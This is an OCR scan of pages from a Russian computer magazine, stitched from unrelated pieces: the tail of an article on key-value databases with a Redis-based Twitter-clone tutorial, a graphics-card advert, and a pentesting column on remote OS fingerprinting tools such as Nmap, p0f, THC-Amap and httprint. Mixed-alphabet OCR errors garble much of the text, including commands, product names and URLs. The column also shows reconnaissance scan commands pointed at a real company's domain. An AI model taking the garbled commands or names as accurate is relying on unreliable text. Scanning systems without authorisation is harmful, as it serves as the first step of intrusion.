ется за счет ввода дополнительных данных (так же как в 
501-базе постоянные данные выделяются в отдельную 
таблицу-справочник]. Правда, в этом случае нужно с само- 
го начала проектировать сайт под такие типы базы. Ведь 
то, что делается одной строкой на 501, здесь потребует 
как нескольких запросов и обработки, так и предваритель- 
ного форматирования данных при записи. 

Увы, автоматических трансляторов 501 в кеу-ѵаіие запро- 
сы пока нет, но работы в этом направлении ведутся. Еще 
одним недостатком таких баз является требовательность к 
параметрам сервера и в особенности оперативной памяти, 
которой, как известно, много не бывает. Прожорливость 
удается удовлетворить за счет хранения неиспользуемых 
данных на диске. Подобным образом поступили разра- 
ботчики МетсасбеОВ, где скрестили популярный сервер 
тетсасбе и базу данных ВегкІеуОВ, используемую как 
постоянное хранилище данных. В более молодом, но 
очень сильном проекте проекте — Весііз — используется 
асинхронная запись в фоновом режиме на диск. Другие 
также не брезгуют использовать традиционные базы дан- 
ных для хранения, ведь их совсем не видно за фасадом 
сервера и они работают локально, поэтому на скорость 
работы почти не влияют. 

СЕРВЕРА — ПОДХОДИ, ВЫБИРАЙ! 

Довольно теории! Давай посмотрим, какие есть базы и 
чем они отличаются. 

МетсасЬесі/МетсасЬеОВ [ тетсасбесІЬ.огд ] — наверное, 
самый известный представитель семейства кеу-ѵаіие БВ. 
Многие используют его как кеширующую систему, что, 
по большому счету, то же самое. Проект хранит данные в 
оперативной памяти, занимает места столько, сколько ему 
выделили, и может объединяться с другими серверами, 
чтобы распределить данные между собратьями. 

Доступ к данным идет через ІЮР-порт и сокеты, что очень 
быстро, а с выходом последней версии, 1.4, добавлен и 
экономичный бинарный протокол. Хотя в РасеЬоок счи- 
тают иначе и ускоряют, как могут, добиваясь нескольких 
сотен тысяч одновременных подключений! Кстати, именно 
эта социальная сеть имеет самую большую инсталляцию 
МетсасбесІ-серверов — в архитектуре участвует более тыся- 
чи серваков! Недостаток мемкеша в том, что он хранит все в 
памяти. По этой причине в местах, где необходима сохран- 
ность данных, придется использовать МетсасбеОВ, который 
использует обычную базу данных как постоянное хранилище 
данных. Другие недостатки — ограниченность на данные, 
которые понимает сервер (это только числа и строки], а также 
сложности выборки одним запросом множества ключей. 
Ргс^есі ѴоШетогІ ( рго|есІ-ѵоІсІетогЕсопп ] — такой же 
мощный, как и Темный Лорд, только в царстве баз данных. 
Штука написана на ^ѵа и изначально нацелена на распре- 
деленность. Добавлять новые сервера можно без остановки 
— данные по ним «расползутся» без посторонней помощи. 
Кроме обычного сетевого доступа, Рго]ес1: Ѵоібетогі поддер- 
живает ^ѵаАРІ и различные сетевые протоколы, например, 
Соодіе РгоІоВиІ или ТЬгііі, что сильно экономит трафик и 
повышает скорость. Данные хранятся как в памяти, так и на 
диске (можно использовать и обычные базы данных], так что 
сбои питания никак не нарушат целостности. 

Сильной стороной является поддержка версионности, 
то есть каждая единица данных имеет историю версий и 
изменений, поэтому можно откатываться назад, если что- 
то записали не то или возникли ошибки. Быстродействие 
также на высоте: в среднем 10-20 тысяч операций в 
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секунду, и такой гигант, как соцсеть Ыпкебіп не прогадал, 
используя кластер из этих серверов для своей работы. 
АрасЬе СоисЬйВ ( соисМЬ.арасбе.огд ] — это уже тяже- 
лое оружие из будущего! Шутка, СоисЬБВ это предста- 
витель отдельного семейства баз данных, называемых 
документно-ориентированными. В этой штуке хранят 
документы, представляющие собой некоторую группу дан- 
ных, которые вместе составляют один объект-документ. 
Например, статья (текст], краткая аннотация, имя автора, 
дата публикации и статус. По отдельности, это просто зна- 
чения, а вот документная база позволяет их сгруппировать 
как один объект и производить над ним операции. АрасЬе 
СоисЬБВ написана на Егіапд (просто замечательная плат- 
форма, если речь идет о расширяемости] и имеет НТТР 
ПЕ5Т-интерфейс или 350ІЧ АРІ, так что можно получать 
данные сразу напрямую из ^ѵа5сгір1а-а на веб-странице! 
Кстати, она имеет встроенный язык запросов, и какой 
ты думаешь? Да, ^ѵа5сгірІ вместо традиционного 5СИ. 
Справедливости ради стоит сказать, что о промышленном 
применении базы пока не слышно. Уж сильно эксперимен- 
тальная разработка, хотя и чрезвычайно перспективная. 
Весііз ( сосіе.доодіе.сопп/р/гесііз ] — проект молодой и 
достаточно простой, но по возможностям мощнее всех 
предыдущих вместе взятых! Почему? Да взять хотя бы 
производительность. Более 100 запросов в секунду на 
простеньком сервере или мощном лаптопе. Знакомься, 
Весііз или, как он сам себя называет, сервер структури- 
рованных данных. Проект позволяет хранить не только 
обычные ключи и значения, но и списки, наборы данных 
(группы пар ключ-значение], а также производить всего 
одной командой (и с гарантированным временем выпол- 
нения!] сложнейшие операции над такими списками. 

Там, где для тетсасЬесІ надо писать вручную две, три 
или десяток команд и еще вычислять что-то в самом при- 
ложении, при использовании Весііз-а можно обойтись 
одной! Поддерживается даже сортировка, что является 
самой сложной и практически не выполнимой командой 
для всех кеу-ѵаіие баз (в отличие от 50Б, где это самая 
тривиальная операция]. Написанный на АІМ5І С сервер 
умещается в паре десятков Кб исходных текстов (по 
лицензии В50], работает на любой системе и сотворит 
чудеса с твоими данными. Команды посылаются по ТСР 
или напрямую через Іеіпеі. Помимо этого, есть и АРІ или 
модули на любой вкус и язык. Не буду скрывать, что сам 
являюсь автором класса-интерфейса для РНР, расши- 
ряющего возможности сервера еще сильнее! :] 

А ДАВАЙ ЗАМУТИМ... 

СВОЙ ТѴѴІТТЕВ?! 

Понимаю, что все, что я выше с таким трудом рассказал, 
это фигня, и хочется сразу почувствовать мощь новой 
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технологии (ладно, не сильно новой, но все 
равно интересной]. Давай попробуем ее в 
действии. Известно, что у самого быстрорас- 
тущего сервиса в мире (ТѵѵіНег) долгое время 



были проблемы с производительностью. 
Писать об этом проекте нам уже надоело, 
поэтому предлагаю забабахать собственную 
альтернативу. С использованием обычной 



БД — это вполне тривиальная задача (если 
не брать в расчет вопрос масштабируемости]. 
Но мы реализуем тот же функционал без при- 
вычной БД — используя только сервер Ребіз. 

С кодом сложностей не должно возникнуть, 
НТМБ-странички ты сверстаешь сам, а вот как 
использовать такую необычную базу внутри, я 
тебе сейчас расскажу. 

ШАГ 0. Определимся, что мы делаем. Наш 
простой твиттер должен уметь хранить акка- 
унты пользователей (и пускать тех, кто знает 
пароль], хранить твои записи и выводить их, 
позволять добавлять и удалять друзей (фол- 
ловеров] и показывать их список, а также ото- 
бражать полную ленту сообщений (как твоих, 
так и всех твоих друзей). 

ШАГ 1. Аккаунты будем хранить в виде 
отдельных пар ключ-значение, где ключом 
будет логин пользователя, а значением — 
сериализированный массив (язык не имеет 
значения, например, РНР], в котором уже 
все о юзере, его имя, пол, дата регистрации 
и остальные данные. Вместо сериализации 
лучше использовать 350ІМ — тогда мы вообще 
не будем зависеть от языка приложения, ведь 
350ІЧ умеет обрабатывать любой современ- 
ный язык программирования. Команда 5ЕТ 
абтіп «{пате:’5ирегѵа5уа’,аде:21 ,5ех:’т’,ге 
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діз1;егесІ:’27.07.2009’} » — записывает нового юзера с логином асітіп. 
Теперь, выполнив запрос СЕТ асітіп, мы получим 35014-строку с дан- 
ными. 

Для авторизации мы используем отдельное значение: 5ЕТ асІтіп_ра55 
« т сі 5 ( р а 55\л/о гсі ] » — ключом здесь также служит логин, но с добавлени- 
ем строки «_разз», а значение — тб5 хеш пароля. 

Авторизация будет в два шага (для надежности, но можно и в 
один). Сначала проверим, существует ли логин: ЕХІ5Т5 абтіп, 
если все ОК (значит, в базе есть такой юзер), извлекаем его хеш 
пароля для проверки: СЕТ абтіп_ра55. Саму проверку и сравне- 
ние хешей придется делать уже в приложении. Не забудем счет- 
чик всех юзеров (а то ведь 5ЕИЕСТ СОІІЫТО здесь нету): I N С Р 
соипІ_изег — увеличит счетчик юзеров на 1. Если тебе захочется 
иметь весь список юзеров, придется раскошелиться на еще одну 
переменную, например, загнав все логины в набор (зеѣ) : САИО 
аІТ_и5ег_ІІ5{ абтіп. Таким образом, в аІІ_изег_ІІ5{ у нас будет 
храниться список всех логинов, по которым можно извлечь про- 
файл аккаунта. 

ШАГ 2. Теперь будем хранить все твои сообщения. Ключом в дан- 
ном случае будет метка времени, потому что ключ должен быть 
уникальным, да и вряд ли ты будешь постить что-то чаще раза в 
секунду (нефиг спамить!). Можем просто создать ключ, исполь- 
зуя логин и метку времени, например, абтіп_1 1232142135, и 
хранить его как отдельное значение вместе с сообщением: 5ЕТ 
абтіп_1 1232142135 «{аиШоп’абтіп’ДехЕ’моя супер статья!’ Діте: 

1 1 232142135, ѣіЕІе : 'статья ! '}». Но чтобы облегчить себе жизнь, мы 
сделаем еще список, где будут храниться данные о времени постов 
каждого автора. Вот так: ВРІІ5Н абтіп_тзд5 1 1232142135. Команда 
добавит в конец списка абтіп_тзд5 новое значение — метку вре- 
мени твоего поста. Зачем? Для облегчения получения потом всех 
постов за определенное время или просто указанного количества, 
например, для постраничного вывода. Внутри списка даты уже 
отсортированные по времени, поэтому дополнительной сортировки 
не нужно. 

ШАГ 3. Если ты хочешь зафолловить (читать) Васю, необходи- 
мо сохранить логин Васи в твоем списке фолловеров. Для этого 
также применим списки, создав для каждого юзера список фол- 
ловеров: РРІІ5Н абтіпДюІІоѵѵ ѵаз)а. В списке абтіпДюІІоѵѵ теперь 
будут храниться логины всех юзеров, которых хочет читать абтіп. 
Аналогично, если Вася хочет читать, что же про него пишет админ: 
ПРИЗН ѵаз)а Дюііоѵѵ абтіп. 

ШАГ 4. Выводим полную ленту сообщений. Мы уже умеем хранить все 
сообщения одного пользователя и хранить список тех, за кем он сле- 
дит. Теперь выводим ленту сообщений, в которой будут как собствен- 
ные сообщения юзера, так и все сообщения тех, за кем он следит. 

При этом, все сообщения должны идти в хронологическом порядке. 



Допустим, мы будем показывать только сообщения за последний час. 
Здесь уже немного сложнее. Сначала выберем список всех пользова- 
телей, которых надо показать. Для этого сначала получим количество 
наших фолловеров (длину списка): НЕМ абтіпДюІІоѵѵ. Допустим, мы 
получили 2 (админ отслеживает двух юзеров): 

ЕРАІМОЕ абптпДюІІоѵѵ 0 1 — получаем в виде массива логины юзеров. 
Не забываем, что надо прибавить сюда и свой логин, так как наши 
сообщения тоже должны быть видны. Это придется делать уже самому 
приложению. 

Далее, имея список логинов, нам надо выбрать все списки 
сообщений каждого юзера. К сожалению, для этого надо N раз 
вызвать команду ЕРАІ40Е, указав ей каждый раз другой список 
(комбинацию логин игрока + _тздз). Конечно, в этом нет ничего 
страшного, ведь скорость работы Ресііз-а очень высокая, но этот 
момент может нуждаться в оптимизации. Например, есть команда 
КЕУ5, которая ищет по паттерну все ключи и возвращает сразу 
список. Поэтому можно попробовать задать ей такое выражение, 
чтобы сразу получить все ключи сообщений (ведь они формиру- 
ются через логин и метку времени, значит можно отфильтровать). 
Но это уже тебе как домашнее задание (на самом деле задача 
имеет несколько решений и не факт, что каждое из них самое 
лучшее). 

Мы пока сделаем по старинке, получив список сообщений для каждого 
юзера, программно сформируем из него список заранее подготовлен- 
ных ключей для извлечения сообщений. Так как все сообщения идут 
по времени, достаточно полученный массив преобразовать из 350І\І-а 
в родной для твоего языка программирования и отбросить все значе- 
ния, меньшие за текущее время минус 3600 (мы ведь за последний час 
выбираем). Если брать не за час, а просто последние 100, то задача 
еще более упростится. 

Далее простым циклом формируем ассоциативный массив из комби- 
нации логин + метка времени, где ключом будет метка времени (число, 
для обеспечения правильной сортировки), а значение — строка вида 
1одт_0те (то есть так, как хранится у нас в Ресііз-е], а потом про- 
сто объединяем эти массивы. Язык сам позаботится о правильной 
последовательности, например, РНРтаки сделает, используя команду 
аггау_тегде и, если надо аггау_зогЕ 

Эту часть нам пришлось вынести из базы и обработать в приложении, 
хотя при обычной архитектуре эта нагрузка легла бы на 5СИ-движок. 

Но это расплата за масштабируемость, поэтому не стоит переживать за 
нагрузку на сервере. 

Последний штрих — сформируем команду к Ресііз-у на извлечение 
всех сообщений, ключи которых мы уже подготовили. У сервера есть 
волшебная команда, которой так не хватает другим популярным 
системам вроде тетсасбесі (там пытаются приспособить для этого 
теги) — МОЕТ список_ключей, то есть одной командой получаем 
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все ключи, имена которых передали. Остается только превратить 
наш массив в строку, разделителем служит символ пробела — и 
мы сразу получим массив ^ОІЧ-строк с сообщениями. Его сразу 
можно передать на веб-страницу, с ^0І\І умеет работать любой 
А^Х-фреймворк. Насчет производительности не стоит пережи- 
вать — операция декодирования ^0І\І в родной для языка массив 
везде очень и очень быстрая, даже если речь идет о сотнях или 
тысячах преобразований. Аналогично можно отобразить список 
всех фолловеров — ведь мы храним их в списке абтіп^оііоѵѵ, 
в котором хранятся логины, а значит, используя потом М6ЕТ- 
команду, мы сразу достанем профайлы всех юзеров, за которыми 
следит админ. 

Я ничего не сказал об удалении данных — вдруг Вася окажется 
занудным типом или спаммером и ты захочешь отписаться от него. 
Для этого надо просто удалить из списка абтіпДюІІоѵѵ его логин, что 
делает команда БЕЕМ, которой стоит передать только логин — и все, 
нет больше Васи. 

ЧТО В РЕЗУЛЬТАТЕ? 

Сейчас реляционные базы данных (50 Б СУБД) уже не правят миром, 
особенно если речь идет о высоконагруженных проектах или сайтах, 
где надо без задержки обслуживать клиентов. 

Если раньше все проблемы пытались решить кешированием, то 
сегодня мы видим, как гиганты индустрии просто уперлись в огра- 
ничения баз данных и в поисках выхода попробовали посмотреть 
на традиционные кеши с другой стороны. И получилось! Добавив 
чуточку смекалки и пару новых команд, теперь можно делать почти 
все, что раньше требовало сложных 501-запросов, используя 
всего пять-шесть команд. При этом неважно, один сервер, десять 
или тысяча, мы вообще никак не ограничены в масштабировании! 
Конечно, не стоит сразу бросать любимый мускул и переписы- 
вать под Весііз или МетсасНесЮВ, но если ты готовишь сайт, где 
надо что-то делать быстро, очень быстро, как можно быстрее (ну 
типа чата, твиттера или онлайн-игры, а то и биржевой системы) 

— попробуй посмотреть на мир кеу-ѵаіие баз данных! Может, это 
то, что надо! А 5СИ-базам оставим нудные дела вроде построения 
аналитики и анализа ланных. т 
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Два вентилятора обеспечивают двойное охлаждение 



Эксклюзивная система 
охлаждения М5І Тѵѵіп Річ> 2 г 

. Два вентилятора с РѴѴМ управлением 
на 5-ти тепловых трубках 
. Массивное никелированное 
медное основание 
. Радиатор больших размеров 



ГМп Ргоіг на ОаГоч* ОТХ 



• СеРогсе СТХ 275 СРС 
» 240 Соге Ргосеззогз 

* 896МВ 448 Ьііз СйОКЗ Метогу 
» ОігесіХ 10 биррог* 


• СеРогсе СТХ 260 СРЫ 

• 216 Соге Ргосеззогз 

• 896МВ 448 Ы*5 СОйКЗ Метогу 

• йігесІХ 10 5иррог* 
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Товар сертифицирован. 
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ЛУЧШИЕ ИНСТРУМЕНТЫ ПЕНТЕСТЕРА 

ИССЛЕДОВАНИЕ УДАЛЕННОЙ СИСТЕМЫ 

У каждого из команды зс — свои предпочтения по части софта и утилит для пентеста. Посовещавшись, 
выяснилось, что выбор так разниться, что можно составить настоящий джентльменский набор из про- 
веренных программ. На том и решили. Чтобы не делать сборную солянку, весь список мы разбили на 
темы. В этот раз мы коснемся того, с чего обычно начинается тест удаленной системы, — анализа уда- 
ленной системы с помощью ЛпдегргіпЛпд’а. 



Важная часть любого пентеста — сбор данных 
об удаленной системе. Более того, именно с 
разведки и начинается атака на удаленный 
хост. Чем больше известно о виртуальном про- 
тивнике, тем проще отыскать инструменты, 
чтобы отправить его в нокдаун. Варианты для 
того, чтобы провести свое маленькое иссле- 
дование существуют разные, но если не брать 
в расчет социальную инженерию и прочие 
экзотические способы (которые, впрочем, не 
стоит сбрасывать со счетов), то исследование 
удаленной системы начинается со скана пор- 
тов, грабинга баннеров с сервисов и, конечно 
же, определения ОС, которая крутится на 
удаленном хосте. Последнее определяется с 
помощью так называемого бпдергіпбпд’а, и 
этой темы мы коснемся более подробно. 
Методов для проведения бпдегргіпбпд’а 
довольно много: РІ ІЧ-сканирование, ІСМР- 
пакетная генерация, исследования полей 
ІСМР и ТСР-пакетов. Но большинство из них 
сводятся к анализу стека ТСР/ІР на удаленной 
системе. Попробую объяснить на примере. 
Допустим, мы наснифали пакет с данными. 

В его заголовке находится множество полей 
вроде размера окна, ТТІ_ (время жизни пакета 
данных), БР (бит фрагментации), флага Т05 
(Туре-ОНЗегѵісе) и т.д. Именно эти данные 
и используют Рпдегргіпііпд -утилиты в своей 
работе. Например, если бит ОР не установлен 
(присуще ОС ОрепВЗО), то в базе сигнатур 
отбрасываются все оси, для которых БР ука- 
зан (обычный метод исключения). Далее под 
прицел попадает параметр ТТІ_: для РгееВЗБ 
и І_іпих этот параметр равен 64. Опять же, круг 
потенциальных 05 сужается — и так до тех 



пор, пока не останется минимум претендентов. 
Впрочем, в этом деле есть уйма тонкостей 
и процесс опознания версии операционки 
может не дать ожидаемых результатов. В слу- 
чае с анализом существующего дампа трафика 
Рпдегргіпбпд называется пассивным. Для 
получения материала для анализа, на удален- 
ный хост могут посылаться специально состав- 
ленные пакеты — в этом случае мы имеем 
дело с активным Рпдегргіпбпд. 



^.ІМтар 

ЬВр://птар.огд 
Платформа: ІГпіх, МасОЗ, 
ѴѴІП 32 

Пожалуй, наиболее известным инструмен- 
том для активного Рпдегргіпбпд’а является 
известнейший сканнер безопасности ІЧтар. 
Мы столько раз упоминали эту тулзу и демон- 
стрировали ее в действии, что во всех подроб- 




ТОПОЛОГИЯ СЕТИ, ПОСТРОЕННАЯ 
СКАННЕРОМ ЫМАР 



ностях рассказывать об ее функционале было, 
по меньшей мере, неприлично. К счастью, раз- 
работчики сделали офигенный подгон и выпу- 
стили в июле новую ветку программы с массой 
полезных нововведений. Тут надо сразу ска- 
зать, что ІЧтар очень многогранный продукт, 
но нас в данном случае интересуют прежде 
всего возможности по 05 Ріпдегргіпбпд’у (ключ 
для запуска -0). Несколько простых экспери- 
ментов показали, что алгоритмы и сигнатурные 
базы у новой версии ІЧтар’а стали давать 
более правдивые результаты. Результат скани- 
рования тісгозоИсот старой версией сканне- 
ра давал едва ли правдивые результаты :). 

пшар -О -РЫ тісгозоіВ . сот 
ЗВагРіпд №пар 4.76 ... 

Кштіпд (ЛІЗТ СІІЕЗЗІШ) : ОрепВЗБ 
4.Х (86%) 

Аддгеззіѵе 03 диеззез: ОрепВЗБ 
4.3 (86%) 

А вот что говорит обновленный ІЧтар: 

птар -О -РЫ тісгозоіС . сот 
ЗВагРіпд №пар 5.00 ... 

Кштіпд (ЛІЗТ СІІЕЗЗІШ) : 

МісгозоіВ Міпсіомз 2003 (91%) 

Аддгеззіѵе 03 диеззез: МісгозоіР 
ЭДіпскжз Зегѵег 2 0 03 ЗР2 (91%) 

Когда-то для запуска утилиты приходилось 
вручную компилировать код и работать со 
сканнером исключительно из командной 
строки. Сейчас на выбор есть сразу несколько 
фронтендов, причем один из них — гептар — 
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входит в состав дистрибутива по умолчанию. 
Тем, кто пока мало знаком с ключами для 
запуска сканнера, он поможет выбрать нуж- 
ное сканирование, а абѵапсеб пользователям 
позволит сохранить тонкие параметры для 
сканирования в виде разных профилей. И тех, 
и других определенно порадует возможность 
интерпретировать результаты и даже строить 
графическую топологию сети. 

Выбрав профиль для сканирования «Іпіепзе 
зсап» и натравив сканер на свою точку досту- 
па, я вновь был приятно удивлен. Во-первых, 
ІЧтар быстро определил версию ядра на 
установленном в девайсе линуксе и правильно 
предположил, что имеет дело с етЬесИесІ- 
устройством. По МАС’у был опознан про- 
изводитель — Азизіек. А анализ 80 порта и 
ответа встроенного НТТР-сервера, на котором 
крутится админка, позволил определить еще и 
точную модель устройства — ѴѴІ_500дР! 
Продолжаю радоваться :). В версии 5.00 
появилось то, о чем мы давно мечтали — 
скриптовый движок, позволяющий с помощью 
самописных сценариев автоматизировать 
самые разнообразные задачи. С помощью 
таких скриптов можно проводить М5РРС/ 
ІЧеіВІОЭ атаки, осуществлять поиск уязвимых 
демонов или банально открытых проксей, 
и даже реализовывать брутфорс для рас- 
пространенных протоколов. В этом всячески 
поможет другая новинка — сетевая утилита 
ІЧсар предназначенная для передачи данных, 
редиректа и отладки сетевых пакетов. А срав- 
нить результаты сканирования разных хостов 
или одной и той же машины, но в разное 
время или с разными параметрами, поможет 
тулза ІЧсШ. Словом, это не просто новая вер- 
сия программы. Это по-настоящему значимый 
релиз одного из лучших инструментов хакера, 
к которому мы обязательно вернемся, когда 
будем говорить о сканнерах безопасности и 
скане портов. 






рОІ Ѵ2 

сатШРсогесІитр.сх 
Платформа: ІІпіх, МасОЗ, 
ѴѴІП32 

В отличие от ІЧтар, который использу- 
ет алгоритмы для реализации активного 
Рпдегргіпбпд’а, рОб работает исключительно 
пассивно. Т.е. в результате работы не генери- 
рует какого-либо трафика, который может тебя 
выдать. Это особенно важно, если на удален- 
ной машине установлено более-менее толко- 
вое средство Ю5 (средство определения атак]. 
Основная задача рОб — определить версию ОС 
на удаленном хосте, в том числе на: 

• машинах, которые присоединяются к тебе 
(так называемый 5ѴІЧ режим); 

• машинах, к которым коннетишься ты (режим 
5УІЧ+АСК); 



• машине, с которой ты не можешь соеди- 
ниться (режим Р5Т+], из-за того, что файрвол 
реджектит подключения; 




ПАССИВНОЕ ОПРЕДЕЛЕНИЕ УДА- 
ЛЕННОЙ ОС С ПОМОЩЬЮ РоР 



• машинах, за взаимодействием которых ты 
можешь наблюдать (исследования существую- 
щей сессии без необходимости какого-либо 
вмешательства с твоей стороны]. 

Помимо этого утилита владеет несколькими 
другими полезными фокусами и в разной 
степени может дать ответ, используется ли в 
локалке ІЧАТ, активен ли файрвол или шейпер, 
а также рассчитать примерное «расстояние» 
до удаленного хоста и его аптайм. В результа- 
те рОб может рассказать об ОС на удаленном 
хосте, даже если она находится за файрволом, 
в то время как любимый ІМтар остается не 
удел. При этом, еще раз повторяю, утилита 
не генерирует какого-либо трафика. Никаких 
Іоокир’ов, загадочных пакетов, АРІІЧ-запросов 
— ничего! 

Изначально рОІ написана для никсов, поэтому 
под виндой придется либо довольствоваться 
прекомпилированной версией с офсайта (а она 
не самая свежая], либо брать в руки исходники 
и колдовать над своей собственной сборкой. 
Кстати говоря, разработчики очень просят 
всячески пополнять базу отпечатков. Для 
этого достаточно перейти на страницу Ісатіиб 
согесІитр.сх/рОНбіеІр и. заполнив несколь- 
ко полей о своей системе, добавить новую 
запись. 



ТНС-Атар < — 

Фс.огд/Фс-атар 
Платформа: ІІпіх, МасОЗ, 
ѴѴІП 32 

Если хочешь выяснить, какие сервисы уста- 
новлены на удаленной машине, — проскани- 
руй ее порты. В большинстве случаев можно 
обойтись одним лишь сканнером безопасности 
(банально ІМтар’ом), однако здесь, как и 
везде, не обошлось без исключений. Каждый 
знает, что любой стандартный сервис обычно 
работает на определенном порте: например, 
РТР на 21 , 55Н на 22 и т.д. Тем не менее, 
администраторы частенько прибегают к одной 
очень простой, но полезной уловке. Чтобы 
скрыть потенциально уязвимые сервисы, они 
устанавливают их на нестандартные порты. В 
этом случае даже добротные сканнеры зача- 
стую обламываются, т.к. не могут определить 
РТР-сервер, работающий на 31337 порту, даже 
если он там действительно есть. Не беда! С 
задачей на ура справляется сканнер Атар от 
известной хакерской группы ТНС. Он с боль- 
шой вероятностью определит даже те серви- 
сы, которые работают не на своих стандартных 



портах. Успех достигается за счет того, что про- 
грамма посылает сервису специальные иден- 
тификационные пакеты, после чего анализи- 
рует ответ и ищет соответствие в специально 
составленной базе сигнатур. Таким образом, 
идентификация осуществляется не по номеру 
порта, а по «отпечаткам пальцев» сервисов. 

До неприличия простой механизм позволяет 
определить 55Н-сервер, запущенный на 988 
порту, или веб-сервер, установленный на 29-м. 
Сканнер Атар легко сканирует как один кон- 
кретный порт, так и заданный диапазон. 

Однако для большей эффективности рекомен- 
дую использовать его совместно с ІЧтар’ом. 
Алгоритм следующий: сначала ІЧтар, исполь- 
зуя все свои возможности, определяет на уда- 
ленной машине открытые порты и записывает 
результат в файл, далее за работу берется 
ТНС-Атар, которому остается проанализиро- 
вать открытые порты и вывести результат. На 
практике это можно сделать примерно так: 

#птар -зЗ -оМ гезиЮз.птар -р 
1-65535 ІР-адрес 

#атар -і гезиІСз.птар -о гезиІДз. 
атар -т 

Несмотря на то, что релизов не было долгое 
время, базы программы по-прежнему обновля- 
ются и доступны на офсайте. 

ЬНргіпІ <— 

ѵѵѵѵѵѵ.пеФзаиаге.сот 

/Ыіргіпі 

Платформа: Ыпих, МасОЗ, 
РгееВЗЙ, ѴѴІП32 

Если привычными средствами распознать 
ОС на удаленном хосте не получается, можно 
попробовать заюзать узкоспециализирован- 
ные утилиты. Например, идентифицировать 
установленный на другой стороне НТТР- 
сервер и, таким образом, сделать предпо- 
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Рііе Іоок Неір 
| — Зеіесі а пеЬлюгк асіаріег іп іИе Іі$1 — 



1 — Г 

> Ііпкз 

• Описание алго- 
ритмов для реали- 
зации пассивного 
бпдегргіпПа, исполь- 
зуемых утитой рОЕ 
рго]есЕбопеѵпеЕогд/ 
рарегзЛіпдег . 
•Документ по актив- 
ному I СМ Р Епдегргіпі: 
ѵѵѵѵѵѵ.зѵз-зесигііѵ. 
сот/ЬітІ/рарегз. 
Мт!. 



> СІѴСІ 

Подборку УТИЛИТ для 
бпдегргіпПа мы под- 
готовили на нашем 
ОѴО-приложении. 







- Са§е РапеІ 






Рііепате | МЭ5 


5огіНо$1$0п: |іРАсИге$$(а$сепс)іпд) _^| ЗогІ апсі РеІге$Н 




$и$ресІ.... 712169.. 


ЁЬД 192.168.151.130 [доИіпдег] (І_іпих) 3 

ІР: 192.168.151.130 
У МАС: 000С29С22Р0С (Ѵгпиаге. Іпс.) 






В Д 05: Ыпих 

баіогі йНСР: Ыпих - І_іпих 2.6 (100.00 X) 

Заіоіі ТСР: Ыпих ■ І_іпих 2.6 (100.00 X) 

ТП: 64 (сіізіапсе: 0) 

Ореп ТСР РогІ$: 

И с> Зепі: 4825 раскеіз (691 852 Ву(е$], 0,00 X, сіеаііехі (0 о( 0 Ву1е$) і 

И <э Ресеіѵес): 5302 раске($ (4 1 08 079 Ву*ев), 0.00 X сіеагіехі (0 оі 0 Ву(е$) 

Іпсотіпд $е$$іоп$: 0 — ' 

0 $ Оиідоіпд $е$$іоп$: 200 
В 31 Но$Юе(аіІ$ 

ОиегіесІ йИб пате$ : ІгаѵеІосіІу.сот,ІгаѵеІосі(у.сот.ІосаІсІотаіп.і.ІгаѵеІрп.сот.еі 
Ѵ/еЬ Вгоѵѵзег Ікег-Адепі 1 : МогіІІа/5.0 (XII; І_іпих І686; еп-115) Оеско/20071 
Ѵ/еЬ В гоотзег СІзег-АдепІ 2 : М 02ІІІа/5. 0 (XII; 11; Ипих І686; еп-СІЗ; гѵ:1.8.0. 12) 0 
Ѵ/еЬ Вготеі І)$ег-Адеп( 3 : Екіда 
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РеІоасІ Са8е Рііез 



Ыѵе 5пі№пд ВиРРег У$аде: 



ОТЧЕТ ЫЕТѴѴОРКМШЕР А 

ложение уже об операционной системе. С такой задачей 
справится тулза ЫТрппЕ 

Немного теории. Когда ты коннектишься к любому сер- 
вису, то в ответ получаешь баннер, по которому теоре- 
тически можно определить используемое ПО. Многие 
администраторы, однако, намеренно подделывают бан- 
неры с помощью специальных патчей, модулей (напри- 
мер, тоб_зесигі1;у.с] и даже специализированного софта 
вроде ЭегѵегМазк ( ѵѵѵѵѵѵ.рогШОзоЛѵѵаге.сопп ). чтобы сбить 
с толку хакера. Однако НЛргіпІ: этим не проведешь. В 
своих исследованиях тулза Ниргіпі опирается на уни- 
кальные сигнатуры, которые присущи каждой конкретной 
программе-серверу. Причем база программы не ограни- 
чивается сигнатурами для Арасбе, 155 и прочих извест- 
ных веб-серверов. В нее также включены и «отпечатки» 
демонов, на которых запущены админки роутеров, А05Б- 
модемов, точек доступа и других устройств. 

Если на сервере используется 55І_-соединение, то ути- 
лита сама распознает факт использования шифрован- 
ного соединения и продолжит сканирование. А заодно 
— соберет всевозможную инфу, в том числе данные по 
сертификатам и используемым шифрам. 

Списки исследуемых серверов можно импортировать из 
текстового файла или отчета сканера ІЧтар. А для увели- 
чения скорости сканирования рекомендуется работать в 
несколько потоков. Правда, функция тиШ-Шгеабіпд реа- 
лизована пока только для линуксовой и виндовых версий 
программы, а во фряхе работать не будет. 

Увы, программа давно не обновляется: последний релиз 
вышел еще в далеком 2005 году. Это влияет не только на 
актуальность сигнатур в базе, но и на работоспособность 
под той же Ѵізіа. 



г>ЫеІѵѵогкМіпег 

ШрУ/зоигсеЕэгде.пеІі/ргоіесЩ 
/пе1:ѵѵогктіпег 
Платформа: ѴѴІпсІоѵѵз 

Эта утилита уже входила в нашу подборку «Сниферы и 
манипуляция пакетами». Еще бы — ведь ЫеІлл/огкМіпег 
является одним из лучших инструментов для анализа 
перехваченных данных, сохраненных в формате РСАР. 
Программа пассивно анализирует дамп с трафиком, четко 
определяет участников обмена сетевыми данными и рас- 
познает операционные системы на каждом из хостов. В 
качестве данных для анализа выступает размер окна, 
время жизни пакета, а также уникальный набор флагов. 
Помимо операционок, ЫеЕл/огкМіпег распознает и струк- 
турировано выдает инфу об открытых сессиях, активных 
портах, баннерах различных демонов и вообще об инфра- 
структуре локальной сети. Не так давно передо мной стояла 
задача по анализу дампа с данными, перехваченными в 
беспроводной сети (возможность обработки ѴѴБАІЧ -трафика 
появилась в утилите относительно недавно), и с помощью 
ЫеЕл/огкМіпег я достаточно быстро разобрался, какие 
машины работают в локалке, на каких ОС крутятся хосты и 
даже, какое оборудование используется в качестве актив- 
ных свитчей и точек доступа. 

Определение ОС основывается на ТОР 5УЫ и 5УЫ+АСК паке- 
тах с использованием базы данных рОГа и ЕЛегсар. Помимо 
этого утилита умеет выполнять Епдегргіпііпд на основе 
ОНСР-пакетов, используя базу данных программы Эаіюгі. 
Само собой, выполняется и идентификация устройств и по 
МАС-адресу: соответствующая база позаимствована у ІМтар. 

!► іке-зсап 

ѵѵ\л/ѵѵ.пЩ-топіЩг.сот/ЩоІ5/іке- 
зсап 

